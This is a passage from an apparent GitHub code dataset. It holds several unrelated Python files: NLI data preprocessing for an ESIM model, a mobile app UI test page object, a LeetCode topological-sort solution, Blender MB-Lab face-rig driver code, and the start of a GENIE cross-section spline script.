\"\"\"\n    Preprocess the data from some NLI corpus so it can be used by the\n    ESIM model.\n    Compute a worddict from the train set, and transform the words in\n    the sentences of the corpus to their indices, as well as the labels.\n    Build an embedding matrix from pretrained word vectors.\n    The preprocessed data is saved in pickled form in some target directory.\n\n    Args:\n        inputdir: The path to the directory containing the NLI corpus.\n        embeddings_file: The path to the file containing the pretrained\n            word vectors that must be used to build the embedding matrix.\n        targetdir: The path to the directory where the preprocessed data\n            must be saved.\n        lowercase: Boolean value indicating whether to lowercase the premises\n            and hypotheses in the input data. Defaults to False.\n        ignore_punctuation: Boolean value indicating whether to remove\n            punctuation from the input data. Defaults to False.\n        num_words: Integer value indicating the size of the vocabulary to use\n            for the word embeddings. 
If set to None, all words are kept.\n Defaults to None.\n \"\"\"\n if not os.path.exists(targetdir):\n os.makedirs(targetdir)\n\n # Retrieve the train, dev and test data files from the dataset directory.\n train_file = \"\"\n dev_file = \"\"\n test_file = \"\"\n for file in os.listdir(inputdir):\n print(file)\n if fnmatch.fnmatch(file, '*-train.*'):\n train_file = file\n elif fnmatch.fnmatch(file, '*-dev.*'):\n dev_file = file\n elif fnmatch.fnmatch(file, '*-test.*'):\n test_file = file\n\n # -------------------- Train data preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing train set \", 20*\"=\")\n print(\"\\t* Reading data...\")\n if datatype == \"NLI\":\n data = read_data(os.path.join(inputdir, train_file),\n lowercase=lowercase,\n ignore_punctuation=ignore_punctuation)\n elif datatype == 'Sogou':\n data = read_data_sogou(os.path.join(inputdir, train_file),\n lowercase=False,\n ignore_punctuation=False\n )\n else:\n raise NotImplementedError\n print(\"\\t* Computing worddict and saving it...\")\n worddict = build_worddict(data, num_words=num_words)\n with open(os.path.join(targetdir, \"worddict.pkl\"), 'wb') as pkl_file:\n pickle.dump(worddict, pkl_file)\n\n print(\"\\t* Transforming words in premises and hypotheses to indices...\")\n if datatype == 'NLI':\n labeldict = {\"entailment\": 0, \"neutral\": 1, \"contradiction\": 2}\n elif datatype == 'Sogou':\n labeldict = {0: 0, 1: 1}\n else:\n raise NotImplementedError\n\n transformed_data = transform_to_indices(data, worddict, labeldict)\n print(len(transformed_data))\n print(\"\\t* Saving result...\")\n with open(os.path.join(targetdir, \"train_data.pkl\"), 'wb') as pkl_file:\n pickle.dump(transformed_data, pkl_file)\n\n # -------------------- Validation data preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing dev set \", 20*\"=\")\n print(\"\\t* Reading data...\")\n if datatype == \"NLI\":\n data = read_data(os.path.join(inputdir, dev_file),\n lowercase=lowercase,\n ignore_punctuation=ignore_punctuation)\n elif datatype == 'Sogou':\n data = read_data_sogou(os.path.join(inputdir, dev_file),\n lowercase=False,\n ignore_punctuation=False\n )\n else:\n raise NotImplementedError\n\n print(\"\\t* Transforming words in premises and hypotheses to indices...\")\n transformed_data = transform_to_indices(data, worddict, labeldict)\n print(\"\\t* Saving result...\")\n with open(os.path.join(targetdir, \"dev_data.pkl\"), 'wb') as pkl_file:\n pickle.dump(transformed_data, pkl_file)\n\n # -------------------- Test data preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing test set \", 20*\"=\")\n print(\"\\t* Reading data...\")\n\n if datatype == \"NLI\":\n data = read_data(os.path.join(inputdir, test_file),\n lowercase=lowercase,\n ignore_punctuation=ignore_punctuation)\n elif datatype == 'Sogou':\n data = read_data_sogou(os.path.join(inputdir, test_file),\n lowercase=False,\n ignore_punctuation=False\n )\n else:\n raise NotImplementedError\n\n print(\"\\t* Transforming words in premises and hypotheses to indices...\")\n transformed_data = transform_to_indices(data, worddict, labeldict)\n print(\"\\t* Saving result...\")\n with open(os.path.join(targetdir, \"test_data.pkl\"), 'wb') as pkl_file:\n pickle.dump(transformed_data, pkl_file)\n\n # -------------------- Embeddings preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing embeddings \", 20*\"=\")\n print(\"\\t* Building embedding matrix and saving it...\")\n embed_matrix = build_embedding_matrix(worddict, 
embeddings_file)\n    with open(os.path.join(targetdir, \"embeddings.pkl\"), 'wb') as pkl_file:\n        pickle.dump(embed_matrix, pkl_file)\n\n\nif __name__ == \"__main__\":\n    import argparse\n\n    parser = argparse.ArgumentParser(description='Preprocess an NLI dataset')\n    parser.add_argument('--config',\n                        default=\"../config/preprocessing.json\",\n                        help='Path to a configuration file for preprocessing')\n    args = parser.parse_args()\n\n    with open(os.path.normpath(args.config), 'r') as cfg_file:\n        config = json.load(cfg_file)\n\n    preprocess_NLI_data(os.path.normpath(config[\"data_dir\"]),\n                        os.path.normpath(config[\"embeddings_file\"]),\n                        os.path.normpath(config[\"target_dir\"]),\n                        lowercase=config[\"lowercase\"],\n                        ignore_punctuation=config[\"ignore_punctuation\"],\n                        num_words=config[\"num_words\"],\n                        datatype=config.get('datatype', 'NLI')\n                        )\n","repo_name":"lixinsu/ESIM","sub_path":"scripts/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":15174,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"}
{"seq_id":"39391349356","text":"from Pages.pageObjects.Common_Buss import CommonBus\nfrom Pages.pageLocators.square_locators import SquareLocators as squareloc\nfrom Common.log import get_logger\nimport time, random\nfrom Pages.pageObjects.sign_pop_page import SignPopPage\nfrom Pages.pageLocators.room_locators import RoomPageLocator as roomloc\nfrom Pages.pageLocators.my_locators import MyLocators as myloc\nfrom Pages.pageObjects.room_page import RoomPage\n\n'''Settings - page operation behavior'''\nlog = get_logger(logger_name=\"square operation log\")\n\nclass SquarePage(CommonBus):\n    '''Square module'''\n    def __init__(self, driver):\n        self.driver = driver\n        self.popPage = SignPopPage(self.driver)\n        self.roomPage = RoomPage(self.driver)\n    \n    '''\n    Nearby posts flow\n    '''\n    def nearby_dynamics(self):\n        self.wait_click_element(squareloc.square_module,model=\"Square module\")\n        self.wait_click_element(squareloc.square_attention,model=\"tap the Follow tab\")\n        time.sleep(2)\n        return self.dynamicDetailPageAssertion()\n    \n    # nearby posts tab\n    def nearby_dynamics_tap(self):\n        self.wait_element_clickable(roomloc.tv_content,model=\"whether the Follow button is clickable\")\n        self.click_element(roomloc.tv_content,model=\"tap the Follow tab\")\n\n    # nearby posts list - open post details\n    def nearby_dynamics_list(self):\n        nearbyDynamicsList = self.is_element_exist(squareloc.tv_content,model=\"nearby posts list\")\n        if nearbyDynamicsList == True:\n            nearby_dynamicsList = self.get_elements(squareloc.tv_content,model=\"get the posts list\") \n            log.info(\"The list has {} entries\".format(len(nearby_dynamicsList)))\n            dt_num = random.randint(0,len(nearby_dynamicsList)-1) \n            dynamics = random.choice(nearby_dynamicsList)\n            log.info(\"Clicking post #{} to view its details\".format(dt_num))\n            time.sleep(3)\n            # nearby_dynamicsList[dt_num].click()\n            dynamics.click()\n            time.sleep(8)\n            if self.is_element_exist(myloc.sendButton,model=\"send button\"):\n                self.assert_true(myloc.sendButton,model=\"send button\")\n                return \"1\"\n            elif self.is_element_exist(squareloc.masterAvatarView,model=\"gift reward entry\"):\n                self.assert_true(squareloc.masterAvatarView,model=\"assert the gift reward entry\")\n                self.roomPage.exit_chat_room()\n                return \"2\"\n            else:\n                log.info(\"The chat room is already closed!!!\")\n                self.save_webImgs(\"did not open post details - chat room closed\")\n                return \"3\"\n        else:\n            nearbyDynamicsList2 = self.is_element_exist(squareloc.nearby_dynamics_list2,model=\"nearby posts list 2\") \n            if nearbyDynamicsList2 == True:\n                nearby_dynamicsList = self.get_elements(squareloc.nearby_dynamics_list2,model=\"get posts list 2\") \n                log.info(\"The list has {} entries\".format(len(nearby_dynamicsList)))\n                dt_num = random.randint(0,len(nearby_dynamicsList)-1) \n                
log.info(\"点击第{}个动态查看详情\".format(dt_num))\n nearby_dynamicsList[dt_num].click()\n time.sleep(5)\n if self.is_element_exist(squareloc.tvnick,model=\"昵称\"):\n self.assert_true(squareloc.tvnick,model=\"昵称\")\n return \"1\"\n elif self.is_element_exist(squareloc.masterAvatarView,model=\"礼物入口1\"):\n self.assert_true(squareloc.masterAvatarView,model=\"断言打赏礼物入口\")\n self.roomPage.exit_chat_room()\n return \"2\"\n else:\n log.info(\"未进入动态详情!!!\")\n self.save_webImgs(\"未进入动态详情\")\n return \"3\"\n else:\n log.info(\"动态列表暂无数据\")\n self.save_webImgs(\"动态列表暂无数据\")\n return \"4\"\n\n #点赞\n def spot_fabulous(self,repeat=9):\n bool = self.is_element_exist(squareloc.iv_prise,model=\"点赞元素\")\n if bool == False and repeat > 0:\n repeat = repeat - 1\n self.swipeUp()\n self.spot_fabulous(repeat)\n ivprise = self.is_clickable(squareloc.iv_prise,model=\"点赞元素\")\n log.info(ivprise)\n if ivprise :\n time.sleep(1)\n self.click_element(squareloc.iv_prise,model=\"点击点赞\")\n else:\n log.info(\"已点过赞了\")\n\n \n #关注\n def click_follow(self):\n if self.is_clickable(squareloc.follow,model=\"关注是否可点击\"):\n time.sleep(1)\n self.click_element(squareloc.follow,model=\"点击关注\")\n gz_toast = \"关注成功\"\n followSuccess = self.get_toast_msg(gz_toast, model=\"关注成功的toast\")\n self.assert_in(gz_toast, followSuccess, model=\"关注用户\") #断言关注\n else:\n log.info(\"已关注,不可再点击关注\")\n\n #举报\n def reportBtn(self):\n self.wait_element_clickable(squareloc.reportBtn,model=\"举报按钮是否可点击\")\n self.click_element(squareloc.reportBtn,model=\"点击举报按钮\")\n time.sleep(1)\n\n ''' 广场-关注-动态'''\n def square_attention(self):\n self.wait_click_element(squareloc.square_module,model=\"广场模块\")\n time.sleep(2)\n self.wait_click_element(squareloc.square_attention,model=\"关注\")\n return self.dynamicDetailPageAssertion()\n\n #动态详情页断言\n def dynamicDetailPageAssertion(self):\n dt_detail = self.nearby_dynamics_list() #动态列表随机-进入动态详情,并断言\n if dt_detail == \"1\":\n self.spot_fabulous() #点赞\n self.click_follow() #关注\n self.roomPage.click_more() #点击更多\n self.reportBtn() #举报\n self.assert_true(squareloc.commitBtn,model=\"举报断言\") #���报断言\n self.roomPage.go_back() #返回详情页\n self.roomPage.go_back_list() #返回列表页\n return True\n elif dt_detail == \"2\":\n # log.info(\"该用户正在聊天室嗨皮呢,所以未进入ta的主页,进入了ta所在的聊天室\")\n return True\n elif dt_detail == \"3\":\n return True\n elif dt_detail == \"4\":\n return True\n else:\n return False","repo_name":"lqrby/lk_test_app","sub_path":"Pages/pageObjects/square_page.py","file_name":"square_page.py","file_ext":"py","file_size_in_byte":6465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10816549981","text":"# 拓扑排序\nfrom Queue import Queue\nfrom collections import Counter\n\n\nclass Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n indegree, graph = Counter(), {}\n count = 0\n for i in range(numCourses):\n graph[i] = []\n for pre in prerequisites:\n indegree[pre[1]] += 1\n graph[pre[0]] += [pre[1]]\n q = Queue()\n for i in range(numCourses):\n if indegree[i] == 0:\n q.put(i)\n if q.empty():\n return False\n while not q.empty():\n cur = q.get()\n count += 1\n for item in graph[cur]:\n indegree[item] -= 1\n if indegree[item] == 0:\n q.put(item)\n if count == numCourses:\n return True\n else:\n return False\n","repo_name":"jia0713/leetcode","sub_path":"200-300/207-Course Schedule.py","file_name":"207-Course 
Schedule.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42077532214","text":"# MB-Lab\n#\n# Сайт ветки MB-Lab: https://github.com/animate1978/MB-Lab\n# Сайт ветки перевода на русский язык MB-Lab: https://github.com/SergeyRom-23/MB-Lab-master-RU\n#\n# ##### НАЧАЛО ЛИЦЕНЗИОННОГО БЛОКА GPL #####\n#\n# Эта программа является свободным программным обеспечением; Вы можете распространять его и / или\n# изменить его в соответствии с условиями GNU General Public License\n# как опубликовано Фондом свободного программного обеспечения; либо версия 3\n# Лицензии или (по вашему выбору) любой более поздней версии.\n#\n# Эта программа распространяется в надежде, что она будет полезна,\n# но БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемой гарантии\n# ИЗДЕЛИЯ или ПРИГОДНОСТЬ ДЛЯ ОСОБЫХ ЦЕЛЕЙ. Смотрите\n# GNU General Public License для более подробной информации.\n#\n# Вам надо принять Стандартнуюй общественную лицензию GNU\n# вместе с этой программой; если нет, напишите в Фонд свободного программного обеспечения,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### КОНЕЦ ЛИЦЕНЗИОННОГО БЛОКА GPL #####\n#\n# ManuelbastioniLAB - Авторские права (C) 2015-2018 Manuel Bastioni\n# Перевод (C) 2019 Сергей Ром 23\n\n\nimport logging\nimport json\nimport os\nimport traceback\n\nimport bpy\n\nfrom . import algorithms\nfrom . import utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef populate_modifier(mod, m):\n mod.active = m['active']\n mod.blend_in = m['blend_in']\n mod.blend_out = m['blend_out']\n mod.influence = m['influence']\n mod.mode = m['mode']\n mod.mute = m['mute']\n mod.poly_order = m['poly_order']\n # type should be created when the modifier is created\n #mod.type = m['type']\n mod.use_additive = m['use_additive']\n mod.use_influence = m['use_influence']\n mod.coefficients[0] = m['coefficients'][0]\n mod.coefficients[1] = m['coefficients'][1]\n\ndef populate_modifiers(modifiers, mlist):\n i = 0\n mod = modifiers[0]\n for m in mlist:\n if i == 0:\n populate_modifier(mod, m)\n i = i + 1\n else:\n mod = modifiers.new(m['type'])\n populate_modifier(mod, m)\n\ndef create_variable(var, driver, mb_name):\n fr_name = var['targets'][0]['id_name']+'.'+mb_name\n face_rig = bpy.data.objects[fr_name]\n\n v = driver.driver.variables.new()\n\n v.name = var['name']\n v.type = var['type']\n # we have one target by default\n v.targets[0].id = face_rig\n v.targets[0].transform_space = var['targets'][0]['transform_space']\n v.targets[0].transform_type = var['targets'][0]['transform_type']\n v.targets[0].bone_target = var['targets'][0]['bone_target']\n\ndef rm_drivers(mname):\n for d in bpy.data.objects[mname].data.shape_keys.key_blocks:\n rc = d.driver_remove('value')\n if not rc:\n logger.critical(\"failed to removed a driver: %d\", rc)\n\ndef add_drivers(drivers, mb_name):\n # Iterate through each driver entry and create driver\n mesh = algorithms.get_active_body()\n mname = mesh.name\n for k, v in drivers.items():\n shape_name = v['data_path'].strip('key_blocks[\"').strip('\"].value')\n idx = bpy.data.objects[mname].data.shape_keys.key_blocks.find(shape_name)\n if idx == -1:\n logger.critical(\"%s ключ формы не найден\", shape_name)\n continue\n check = bpy.data.objects[mname].data.shape_keys.animation_data and \\\n bpy.data.objects[mname].data.shape_keys.animation_data.drivers.\\\n find(v['data_path'])\n if check:\n logger.critical(\"%s у ключа формы уже есть данные анимации\", 
shape_name)\n continue\n\n # NOTE: The call to driver_add adds a modifier of type GENERATOR\n # automatically\n driver = bpy.data.objects[mname].data.shape_keys.key_blocks[idx]. \\\n driver_add('value')\n\n # Populate the driver\n driver.hide = v['hide']\n driver.lock = v['lock']\n driver.mute = v['mute']\n driver.select = v['select']\n populate_modifiers(driver.modifiers, v['modifiers'])\n driver.driver.expression = v['driver']['expression']\n driver.driver.is_valid = v['driver']['is_valid']\n driver.driver.type = v['driver']['type']\n driver.driver.use_self = v['driver']['use_self']\n variables = v['driver']['variables']\n for var in variables:\n create_variable(var, driver, mb_name)\n\ndef add_facs_drivers(skd, mesh):\n au_div = skd['Divisor']['au_value']\n gz_div = skd['Divisor']['gz_value']\n\n mname = mesh.name\n\n for au, exprs in skd.items():\n if au == 'Divisor':\n continue\n\n # get the object\n slider = \"facs_rig_slider_\"+au+\".\"+mname\n slider_obj = bpy.data.objects.get(slider)\n if not slider_obj:\n logger.critical(\"%s slider controller not found\", slider)\n continue\n\n # iterate over all the expressions which are part of this AU\n for skn, skv in exprs.items():\n # Look up the shape key\n idx = bpy.data.objects[mname].data.shape_keys.key_blocks.find(skn)\n if idx == -1:\n logger.critical(\"%s shape key not found\", skn)\n continue\n\n # Add a variable for the AU\n data_path = 'key_blocks[\"'+skn+'\"].value'\n no_animation = not bpy.data.objects[mname].data.shape_keys.animation_data\n\n if no_animation:\n logger.critical(\"FACS system depends on facial rig. Please add one\")\n return -1\n\n # get the driver\n driver = bpy.data.objects[mname].data.shape_keys.animation_data.drivers.find(data_path)\n if not driver:\n logger.critical(\"FACS system depends on facial rig. Please add one\")\n return -1\n\n # Add the variable for the Action Unit\n v = driver.driver.variables.new()\n\n v.name = au\n v.type = 'TRANSFORMS'\n # we have one target by default\n v.targets[0].id = slider_obj\n v.targets[0].transform_space = 'LOCAL_SPACE'\n v.targets[0].transform_type = 'LOC_X'\n\n # append to the existing expression\n # max_slider_value * constant = max_shape_key_value\n # constant = max_shape_key_value / max_slider_value\n # Formula for transforming slider value to shape key value is\n # shape_key_value = slider_value * constant\n # slider value is extracted from the variable we created\n if au == 'GZ0H' or au == 'GZ0V':\n constant = skv / gz_div\n if '_min' in skn:\n driver.driver.expression = driver.driver.expression + '+ ('+au+'*'+str(constant)+')'\n elif '_max' in skn:\n driver.driver.expression = driver.driver.expression + '+ (-'+au+'*'+str(constant)+')'\n else:\n constant = skv / au_div\n driver.driver.expression = driver.driver.expression + '+ ('+au+'*'+str(constant)+')'\n\n return 0\n\ndef append_rig(rig_name, data_path):\n face_rig_blend = os.path.join(data_path, \"face_rig\", \"face_rig_lib.blend\")\n\n if not os.path.exists(face_rig_blend):\n logger.critical(\"%s not found. 
Might need to reinstall ManuelBastioniLab\", face_rig_blend)\n        return False\n\n    file_path = face_rig_blend+\"\\\\\"+\"Collection\\\\\"+rig_name\n    directory = face_rig_blend+\"\\\\\"+\"Collection\"\n    try:\n        bpy.ops.wm.append(filepath=file_path, filename=rig_name, directory=directory)\n    except RuntimeError as e:\n        logger.critical(\"%s\", str(e))\n        return False\n\n    return True\n\ndef find_collLayer(layerColl, collName):\n    found = None\n    if (layerColl.name == collName):\n        return layerColl\n    for layer in layerColl.children:\n        found = find_collLayer(layer, collName)\n        if found:\n            return found\n\ndef rename_collection(collLayer, new):\n    collLayer.collection.name = new\n\ndef rename_object_in_collection(c, orig, new):\n    for obj in c.collection.all_objects:\n        if obj.name == orig:\n            obj.name = new\n\ndef get_root_bone(armat, root):\n    armat.select_set(True)\n    bpy.context.view_layer.objects.active = armat\n    bpy.ops.object.mode_set(mode='POSE')\n    for b in bpy.context.object.pose.bones:\n        if b.name == root:\n            return b\n    return None\n\ndef get_root_bone_xyz_loc(obj):\n    # move the Rigs closer to the character\n    armat = utils.get_deforming_armature(obj)\n    if not armat:\n        logger.critical(\"No armature found for character %s. Ignoring\",\n                        obj.name)\n        return 0, False\n\n    root_bone = get_root_bone(armat, 'root')\n    if not root_bone:\n        logger.critical(\"%s does not have a root bone. Ignoring\", obj.name)\n        return 0, False\n\n    root_x = root_bone.location[0]\n    root_y = root_bone.location[1]\n    root_z = root_bone.location[2]\n\n    return root_x, root_y, root_z, True\n\ndef setup_face_rig(obj):\n    face_rig_collName = 'Face_Rig.'+obj.name\n    face_rig_name = 'MBLab_skeleton_face_rig.'+obj.name\n    ph_rig_collName = 'Phoneme_Rig.'+obj.name\n    ph_rig_name = 'MBLab_skeleton_phoneme_rig.'+obj.name\n\n    layerColl = find_collLayer(bpy.context.view_layer.layer_collection,\n                               face_rig_collName)\n    # check if the face rig is already imported\n    if layerColl:\n        logger.critical(\"character already has a face rig\")\n        return False\n\n    data_path = algorithms.get_data_path()\n\n    # Load the face rig\n    if not data_path:\n        logger.critical(\"%s not found. Please check your Blender addons directory. Might need to reinstall ManuelBastioniLab\", data_path)\n        return False\n\n    if not append_rig('Face_Rig', data_path) or \\\n       not append_rig('Phoneme_Rig', data_path):\n        return False\n\n    # rename imported items\n    fr_coll = find_collLayer(bpy.context.view_layer.layer_collection, 'Face_Rig')\n    if not fr_coll:\n        logger.critical(\"Face Rig broken. Manually delete\")\n        return False\n    rename_collection(fr_coll, face_rig_collName)\n    rename_object_in_collection(fr_coll, 'MBLab_skeleton_face_rig', face_rig_name)\n\n    pr_coll = find_collLayer(bpy.context.view_layer.layer_collection, 'Phoneme_Rig')\n    if not pr_coll:\n        logger.critical(\"Phoneme Rig broken. Manually delete\")\n        return False\n    rename_collection(pr_coll, ph_rig_collName)\n    rename_object_in_collection(pr_coll, 'MBLab_skeleton_phoneme_rig', ph_rig_name)\n\n    # load face rig json file\n    json_file = os.path.join(data_path, \"face_rig\", \"expression_drivers.json\")\n\n    if not os.path.exists(json_file):\n        logger.critical(\"%s not found. 
Might need to reinstall ManuelBastioniLab\", json_file)\n        return False\n\n    with open(json_file, 'r') as f:\n        drivers = json.load(f)\n        add_drivers(drivers, obj.name)\n\n    root_x, root_y, root_z, rc = get_root_bone_xyz_loc(obj)\n    if not rc:\n        return True\n\n    # set the root of the face and phoneme rigs\n    face_rig = algorithms.get_object_by_name(face_rig_name)\n    if not face_rig:\n        logger.critical(\"Can't find %s. Delete face rig manually\",\n                        face_rig_name)\n        return False\n\n    root_bone = get_root_bone(face_rig, 'root')\n    if not root_bone:\n        logger.critical(\"%s does not have a root bone. Ignoring\", obj.name)\n        return True\n\n    root_bone.location[0] = root_x + 0.5\n    root_bone.location[1] = -root_z\n    root_bone.location[2] = root_y\n\n    ph_rig = algorithms.get_object_by_name(ph_rig_name)\n    if not ph_rig:\n        logger.critical(\"Can't find %s. Delete phoneme rig manually\",\n                        ph_rig_name)\n        return False\n\n    root_bone = get_root_bone(ph_rig, 'root')\n    if not root_bone:\n        logger.critical(\"%s does not have a root bone. Ignoring\", obj.name)\n        return True\n\n    root_bone.location[0] = root_x + 0.5\n    root_bone.location[1] = -root_z\n    root_bone.location[2] = root_y\n\n    return True\n\ndef rename_facs_objs(c, post):\n    for obj in c.collection.all_objects:\n        obj.name = obj.name+\".\"+post\n\ndef setup_facs_rig(obj):\n    # check if the facs rig is already imported\n    facs_rig_collName = 'Facs_Rig.'+obj.name\n    layerColl = find_collLayer(bpy.context.view_layer.layer_collection,\n                               facs_rig_collName)\n    # check if the facs rig is already imported\n    if layerColl:\n        logger.critical(\"Character already has a FACS rig\")\n        return False\n\n    data_path = algorithms.get_data_path()\n\n    # Load the FACS rig\n    if not data_path:\n        logger.critical(\"%s not found. Please check your Blender addons directory. Might need to reinstall ManuelBastioniLab\", data_path)\n        return False\n\n    if not append_rig('Facs_Rig', data_path):\n        return False\n\n    # rename imported items\n    facs_coll = find_collLayer(bpy.context.view_layer.layer_collection, 'Facs_Rig')\n    if not facs_coll:\n        logger.critical(\"FACS Rig broken. Manually delete\")\n        return False\n    rename_collection(facs_coll, facs_rig_collName)\n    rename_facs_objs(facs_coll, obj.name)\n\n    # load face rig json file\n    json_file = os.path.join(data_path, \"face_rig\", \"facs_au.json\")\n\n    if not os.path.exists(json_file):\n        logger.critical(\"%s not found. Might need to reinstall ManuelBastioniLab\", json_file)\n        return False\n\n    with open(json_file, 'r') as f:\n        shape_keys = json.load(f)\n    try:\n        add_facs_drivers(shape_keys, obj)\n    except Exception as e:\n        traceback.print_stack()\n        logger.critical(\"%s\", str(e))\n        return False\n\n    root_x, root_y, root_z, rc = get_root_bone_xyz_loc(obj)\n    if not rc:\n        return True\n\n    facs_frame = \\\n        algorithms.get_object_by_name('facs_rig_frame.'+obj.name)\n    if not facs_frame:\n        logger.critical(\"FACS frame %s not found\",\n                        'facs_rig_frame.'+obj.name)\n        return True\n\n    facs_frame.location[0] = root_x + 0.5\n    facs_frame.location[1] = -root_y\n    facs_frame.location[2] = -root_z + facs_frame.location[2]\n\n    return True\n\ndef recursive_collection_delete(head):\n    for c in head.children:\n        recursive_collection_delete(c)\n\n    head.hide_select = False\n    head.hide_render = False\n    head.hide_viewport = False\n\n    for obj in head.all_objects:\n        obj.select_set(True)\n    bpy.ops.object.delete()\n\n    bpy.data.collections.remove(head)\n\ndef delete_face_rig(obj):\n    if 'MBLab_skeleton_face_rig.' not in obj.name and 'MBLab_skeleton_phoneme_rig.' not 
in obj.name:\n        return False\n\n    character_name = ''\n    if 'MBLab_skeleton_face_rig.' in obj.name:\n        character_name = obj.name.replace('MBLab_skeleton_face_rig.', '')\n    elif 'MBLab_skeleton_phoneme_rig.' in obj.name:\n        character_name = obj.name.replace('MBLab_skeleton_phoneme_rig.','')\n\n    fr_name = 'MBLab_skeleton_face_rig.'+character_name\n    pr_name = 'MBLab_skeleton_phoneme_rig.'+character_name\n\n    # check if the face rig is already imported\n    facerig = bpy.data.objects.get(fr_name)\n    if not facerig:\n        logger.critical(\"face rig was not added\")\n        return False\n\n    # check if the phoneme rig is already imported\n    phoneme = bpy.data.objects.get(pr_name)\n    if not phoneme:\n        logger.critical(\"phoneme rig was not added\")\n        return False\n\n    rm_drivers(character_name)\n\n    # store the original selection\n    orig_selection = {}\n    for ob in bpy.context.scene.objects:\n        orig_selection[ob.name] = ob.select_get()\n        ob.select_set(False)\n\n    # delete all the rigs\n    facerig.select_set(True)\n    phoneme.select_set(True)\n    bpy.ops.object.mode_set(mode=\"OBJECT\")\n    bpy.ops.object.delete()\n\n    # delete all the collections\n    c = bpy.data.collections.get('Face_Rig.'+character_name)\n    if c:\n        recursive_collection_delete(c)\n    c = bpy.data.collections.get('Facs_Rig.'+character_name)\n    if c:\n        recursive_collection_delete(c)\n    c = bpy.data.collections.get('Phoneme_Rig.'+character_name)\n    if c:\n        recursive_collection_delete(c)\n\n    # restore the original selection\n    for ob in bpy.context.scene.objects:\n        ob.select_set(orig_selection[ob.name])\n\n    return True\n\n","repo_name":"SergeyRom-23/MB-Lab-master-RU","sub_path":"facerig.py","file_name":"facerig.py","file_ext":"py","file_size_in_byte":17082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"36483685320","text":"import os, glob, re\nimport FNALGridUtils as FNAL\n\n# Define Dictionaries\nnucleons_pdg = {\n    'n' : 1000000010,\n    'p' : 1000010010 }\nnucleons_name = {\n    1000000010 : 'n',\n    1000010010 : 'p' } \ntgt_pdg = [1000010020, 1000010030, 1000020030, 1000020040, 1000060120, 1000080160, 1000130270, 1000200400, 1000200480, 1000260560, 1000791970, 1000822080, 1000922380 ]\n\nnucleons_EW_proc = [ 'none', 'CCRES', 'NCRES', 'CCDIS', 'NCDIS', 'CCDFR', 'NCDFR', 'Fast' ]\nnucleons_EM_proc = [ 'none', 'EMRES', 'EMDIS', 'EMQEL' ]\nnuclei_EW_proc = [ 'none', 'WeakMEC', 'CCCOHPION', 'NCCOHPION', 'Fast' ]\nnuclei_EM_proc = [ 'none', 'EMMEC', 'EMQE', 'EMRES', 'EMDIS' ]\n\nnu_pdg_def = { 've' : 12,\n               'vebar' : -12,\n               'vmu' : 14,\n               'vmubar' : -14,\n               'vtau' : 16,\n               'vtaubar' : -16 }\nnu_name_def = { 12 : 've' ,\n                -12 : 'vebar' ,\n                14 : 'vmu' ,\n                -14 : 'vmubar' ,\n                16 : 'vtau' ,\n                -16 : 'vtaubar' }\ne_pdg_def = { 'e' : 11, \n              'ebar' : -11 }\ne_name_def = { 11 : 'e', \n               -11: 'ebar' }\n\n\ndef GroupSplineCommands( group_vN=False, xml_dir=os.getenv('PWD'), mother_dir='', tune='G18_02_02_11b', gen_list='all',version='master', conf_dir='', grid_system='FNAL', group='genie', \n                         arch='SL6.x86_64', production='routine_validation', cycle='01', softw_topdir=os.getenv('GENIE_MASTER_DIR'),\n                         genie_topdir=os.getenv('GENIE'), grid_setup = os.getenv('GENIE')+'src/scripts/production/python/setup_FNAL.sh',\n                         genie_setup = os.getenv('GENIE')+'src/scripts/production/python/setup_GENIE.sh', jobs_topdir=os.getenv('PWD'), add_list=False, add_nucleons = False, \n                         time=2, memory=\"2GB\",disk=\"2GB\", git_branch=\"master\", git_loc=\"https://github.com/GENIE-MC/Generator\", configure_INCL=False, configure_G4=False ) :\n    \n    # Store root output only for 
vA splines:\n    root_output = False \n    if group_vN == False: \n        root_output = True\n\n    if not os.path.exists(xml_dir) :\n        print ( xml_dir+\" doesn't exist\")\n        return \n\n    store_total_xsec = False\n    if gen_list == 'none' :\n        store_total_xsec = True \n\n\n    if group_vN == True : \n        process_name = \"group_vN\"\n        job_ID = 1 \n    else : \n        process_name = \"group_vA\"\n        job_ID = 3 \n\n    if mother_dir != '' : \n        if os.path.exists(mother_dir) :\n            xml_files_motherdir = glob.glob(mother_dir+\"/*.xml\")\n        else :\n            print ( mother_dir+\" doesn't exist\")\n            return \n\n        #Given a mother directory and a daughter directory, the script tries\n        # to copy (ln -s) all the files in the mother dir into the daughter.\n        # If the file already exists, the link is not created.\n        for xml_file in xml_files_motherdir : \n            # Check if it already exists in xml_dir \n            xml_file_name = os.path.basename(xml_file)\n            if os.path.exists(xml_dir+\"/\"+xml_file_name[:-4]+\".sh\") : continue \n            \n            if xml_file_name[:-4] == 'total_xsec' : \n                if store_total_xsec == True : \n                    os.link(xml_file,xml_dir+\"/\"+xml_file_name) # link xml files\n                continue \n            os.link(xml_file,xml_dir+\"/\"+xml_file_name) # link xml files\n            os.link(xml_file[:-4]+\".sh\",xml_dir+\"/\"+xml_file_name[:-4]+\".sh\") # link sh files\n        if store_total_xsec == True : \n            temp_command_dict = {}\n            temp_command_dict[job_ID] = []\n            return temp_command_dict \n\n    # Get names of sh files: these determine the name of the future xml files\n    xml_files_dir = glob.glob(xml_dir+\"/*.sh\")\n    \n    # Store nu, tgt and process that have a corresponding xml file\n    dir_nu_list = []\n    dir_e_list = []\n    dir_nu_tgt_list = []\n    dir_e_tgt_list = []\n    dir_EW_process_list = []\n    dir_EM_process_list = []\n    ## store for later\n    lepton_list = []\n    